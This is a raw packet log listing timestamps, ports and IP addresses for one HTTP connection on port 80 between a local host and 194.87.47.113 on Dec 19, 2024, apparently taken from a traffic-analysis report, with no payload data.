Dec 19, 2024 08:47:28.881071091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.881071091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.881863117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.881870985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.882028103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.882900953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.882920980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.882992983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.884047031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.884057045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.884102106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.884949923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.884959936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.885044098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.885787964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.885797024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.885804892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.885860920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.886712074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.886814117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.887681961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.887691975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.887700081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.887813091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.888659000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.888669014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.888746977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.889636040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.889652014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.889719009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.890575886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.890585899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.890624046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.891570091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.891580105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.891633034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.892486095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.892496109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.892503023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.892539024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.892596006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.893505096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.893524885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.893630028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.894442081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.894449949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.894505024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.024219990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.024408102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.024499893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.024831057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.024840117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.024894953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.025670052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.026168108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.026336908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.029722929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.043241024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.043330908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.043432951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.043744087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.043888092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.043912888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.044311047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.044385910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.044722080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.044732094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.044796944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.045356035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.045442104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.045516968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.046076059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.046267986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.046286106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.046353102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.047034979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.047111988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.047873974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.047885895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.047977924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.048254013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.048741102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.048749924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.048794985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.049427986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.049477100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.049817085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.050214052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.050228119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.050256968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.051002979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.051048040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.051198959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.051292896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.051356077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.051639080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.052115917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.052124977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.052174091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.052820921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.052927971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.053670883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.053679943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.053747892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.054116011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.055588007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.055598021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.055613041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.055623055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.055794954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.055794954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.056008101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.056097984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.056868076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.056876898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.056929111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.057183981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.057630062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.057638884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.057746887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.058367014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.058440924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.059206963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061753035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061760902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061794043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061803102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061810017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061811924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.061819077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.061839104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.061853886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.062194109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.062242985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.062340975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.063029051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.063036919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.063081026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.063741922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.063781023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.063868999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.064735889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.064784050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.065140009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.065149069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.065200090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.065841913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.066186905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.066195011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.066302061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.066870928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.066879034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.066936970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.067615986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.067665100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.067930937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.068295002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.068305016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.068367004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.068978071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.069041014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.069405079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.069689989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.069698095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.069793940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.070084095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.070364952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.070427895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.070871115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.071079016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.071094036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.071147919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.071813107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.072021008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.072649956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.072659016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.072702885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.072968006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.073478937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.073487043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.073546886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.074198961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.074327946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.074413061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077311993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077327013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077375889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077384949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077408075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077439070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.077439070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.077439070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.077671051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077688932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.077742100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.079000950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.079020023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.079108000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.079536915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.079902887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.079977989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.080581903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.080590010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.080605984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.080713987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.080756903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.080773115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.080864906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.081533909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.081643105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.081721067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.082272053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.082396030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.082451105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.216588020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.216742992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.216876030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.217258930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.217266083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.217333078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.217999935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.218189001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.218293905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.218729019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.235439062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.235558987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.235589981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.235941887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.236049891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.236387014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.236639023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.236717939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.236886024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.237262964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.237476110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.237626076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.238348961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.238545895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.238547087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.238554955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.238631964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.241955042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.241961956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.241976976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.241982937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.241990089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.241997004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.242003918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.242074013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.242074013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.242074013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.242122889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.242201090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.242599964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.243563890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.243632078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.243711948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.243870020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.243925095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.244225025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.244827032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.244832993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.244951010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.245162010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.245218992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.245663881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.245827913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.245877028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.246085882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.246400118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.246407032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.246474028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.247104883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.247334003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.247514009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.247916937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.248013020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.248254061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.248713970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.248755932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.248843908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.249547958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.249555111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.249675035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.250385046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.250533104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.250813961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.251115084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.251122952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.251252890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.251879930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.252008915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.252099037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.252640009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.252722025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.252837896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.253452063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.253560066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.253638983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.254201889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.254272938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.254451990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.255023003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.255086899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.255208015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.255817890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.255893946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.255991936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.256608009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.256675959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.256789923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.257390976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.257446051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.257581949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.258193016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.258353949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.258420944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.258970022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.259046078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.259207010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.259788990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.259848118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.260466099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.260704994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.260714054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.260760069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.261380911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.261502028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.261723042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.262135029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.262202978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.262566090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.262933969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.263037920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.263122082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.263730049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.263793945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.263905048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.264558077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.264659882 CET	49707	80	192.168.2.7	194.87.47.113
